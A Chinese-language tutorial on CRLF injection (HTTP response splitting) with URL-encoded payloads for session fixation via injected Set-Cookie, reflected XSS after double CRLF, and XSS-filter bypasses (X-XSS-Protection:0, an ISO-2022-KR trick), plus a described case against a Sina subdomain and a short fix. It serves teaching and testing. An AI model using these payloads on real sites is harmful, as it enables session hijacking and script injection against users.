CRLF Injection
CRLF
CRLF 是”回车 + 换行”(\r\n
)的简称。在 HTTP 协议中,HTTP Header 与 HTTP Body 是用两个 CRLF 分隔的,浏览器就是根据这两个 CRLF 来取出 HTTP 内容并显示出来。 所以,一旦我们能够控制 HTTP 消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话 Cookie 或者 HTML 代码,所以 CRLF Injection 又叫 HTTP Response Splitting,简称 HRS。
HRS 是比 XSS 危害更大的安全问题,具体是为什么,我们往下看。
对于 HRS 最简单的利用方式是注入两个 \r\n
,之后在写入 xss 代码,来构造一个 xss。
举个例子,一般网站会在 HTTP 头中用 Location: http://baidu.com
这种方式来进行 302 跳转,所以我们能控制的内容就是 Location:后面的 XXX 某个网址。
所以一个正常的 302 跳转包是这样:
HTTP/1.1 302 Moved Temporarily
Date: Fri, 27 Jun 2014 17:52:17 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://www.sina.com.cn
但如果我们输入的是
http://www.sina.com.cn%0aSet-cookie:JSPSESSID%3Dwooyun
注入了一个换行,此时的返回包就会变成这样:
HTTP/1.1 302 Moved Temporarily
Date: Fri, 27 Jun 2014 17:52:17 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: http://www.sina.com.cn
Set-cookie: JSPSESSID=wooyun
这个时候这样我们就给访问者设置了一个 SESSION,造成一个“会话固定漏洞”。 当然,HRS 并不仅限于会话固定,通过注入两个 CRLF 就能造成一个无视浏览器 Filter 的反射型 XSS。 比如一个网站接受 url 参数 http://test.sina.com.cn/?url=xxx,xxx
放在 Location 后面作为一个跳转。如果我们输入的是:
http://test.sina.com.cn/?url=%0d%0a%0d%0a<img src=1 onerror=alert(/xss/)>
我们的返回包就会变成这样:
HTTP/1.1 302 Moved Temporarily
Date: Fri, 27 Jun 2014 17:52:17 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location:
<img src=1 onerror=alert(/xss/)>
之前说了浏览器会根据第一个 CRLF 把 HTTP 包分成头和体,然后将体显示出来。于是我们这里 <img>
这个标签就会显示出来,造成一个 XSS。
为什么说是无视浏览器 filter 的,这里涉及到另一个问题。
浏览器的 Filter 是浏览器应对一些反射型 XSS 做的保护策略,当 url 中含有 XSS 相关特征的时候就会过滤掉不显示在页面中,所以不能触发 XSS。
怎样才能关掉 filter?一般来说用户这边是不行的,只有数据包中 http 头含有 X-XSS-Protection 并且值为 0 的时候,浏览器才不会开启 filter。
说到这里应该就很清楚了,HRS 不正是注入 HTTP 头的一个漏洞吗,我们可以将 X-XSS-Protection:0
注入到数据包中,再用两个 CRLF 来注入 XSS 代码,这样就成功地绕过了浏览器 filter,并且执行我们的反射型 XSS。
所以说 HRS 的危害大于 XSS,因为它能绕过一般 XSS 所绕不过的 filter,并能产生会话固定漏洞。
我们来一个真实案例吧。
新浪某分站含有一个 url 跳转漏洞,危害并不大,于是我就想到了 CRLF Injection,当我测试
http://xxx.sina.com.cn/?url=%0a%0d%0a%0d%3Cimg%20src=1%3E
的时候,发现图片已经输出在页面中了,说明 CRLF 注入成功了:
那么我们试试 XSS 看看:
看控制台,果然被 XSS Filter 拦截了。
那么我们就注入一个 X-XSS-Protection:0
到数据包中,看看什么效果:
http://192.168.238.129:8080/%0aX-XSS-Protection:%200%0a%0d%0a%0d<img%20src=1%20onerror=alert(/xss/)>
@mramydnei 还想到了一个利用字符编码来绕过 XSS Filter 的方法,当编码是 is-2022-kr
时浏览器会忽略 %0f
,这样我们在 onerror 后面加个 %0f
就能绕过 filter,前提是注入一个 <meta charset=ISO-2022-KR>
:
当然,在 Location:
这里注入只有 webkit 内核浏览器才能够利用,其他浏览器可能会跳转、出错。不过对于 chrome 的使用量来说,危害已经足够了。
如何修复 HRS 漏洞,当然是过滤 \r
、\n
之类的换行符,避免输入的数据污染到其他 HTTP 头。
POC
Payload: http://your-ip:8080/%0d%0aSet-Cookie:%20a=1,可注入 Set-Cookie 头
%0d%0a%0d%0a<meta%20charset=ISO-2022-KR><img%20src=1%20onerror%0f=alert(1)>
Bottle HTTP 头注入
res.set_header('Location', urljoin(request.url, url))
其中使用了一个 urljoin,将当前 url 和我传入的 path 进行了一次"join",经过这个操作事情就变得很微妙了:Location
头一定有一个值。这种情况下,浏览器就不会渲染页面,会直接跳转到 Location 头指向的地址。也就是说,如果我要利用 CRLF 构造 XSS 的话,这里是不会触发的。
回想上面提到过的新浪的那个 CRLF,那个漏洞的 Location
是可以为空的,如果浏览器发现 Location
为空就不会进行跳转,进而渲染了后面注入的 HTML,造成 XSS。
那么本文这里怎么处理?
当时我提出了使用 \0
来阻止 PHP 返回 Location
头的方法。因为 PHP 的 header 函数一旦遇到 \0
、\r
、\n
这三个字符,就会抛出一个错误,此时 Location
头便不会返回,浏览器也就不会跳转了。
其实当时我还想出来一个方法:在 PHP 没有关闭 display_errors
的情况下,只要在 header 位置的前面某处构造一个错误,一旦有错误信息在 header 前被输出,header 函数也就不会执行了 -- 原因是我们不能在 HTTP 体已经输出的情况下再输出 HTTP 头。
前人栽树